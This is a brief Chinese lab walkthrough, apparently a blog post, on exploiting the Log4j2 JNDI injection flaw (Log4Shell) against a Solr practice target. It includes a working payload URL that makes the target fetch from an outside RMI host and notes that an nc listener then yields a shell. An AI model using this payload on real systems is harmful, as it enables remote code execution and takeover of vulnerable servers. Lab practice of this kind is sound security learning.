漏洞简介
Apache Log4j 2 是对 Log4j 的升级,它⽐其前身 Log4j 1.x 提供了显 着改进,并提供了 Logback 中可⽤的许多改进,同时修复了 Logback 架构中的⼀些固有问题。
2021 年 12 ⽉,在 Apache Log4j2 中发现了⼀个 0-day 漏洞。
Log4j 的 JNDI ⽀持并没有限制可以解析的名称。⼀些协议像rmi:和 ldap:是不安全的或者可以允许远程代码执⾏。
开启靶场
JNDI-Injection-Exploit-1.0.jar 开启 RMI 服务
在 url 中插⼊构造的 payload
http://192.168.121.129:8983/solr/admin/cores? action=${jndi:rmi://116.62.17.187:1099/qdz3ly}
开启 nc 监听,成功 getshell
其实很简单,大家加油。
















![[Linux#46][线程->网络] 单例模式 | 饿汉与懒汉 | 自旋锁 |读写锁 | 网络基础 | 书单](https://img-blog.csdnimg.cn/img_convert/6d2a26fcdeb936598828a0578de6306a.png)

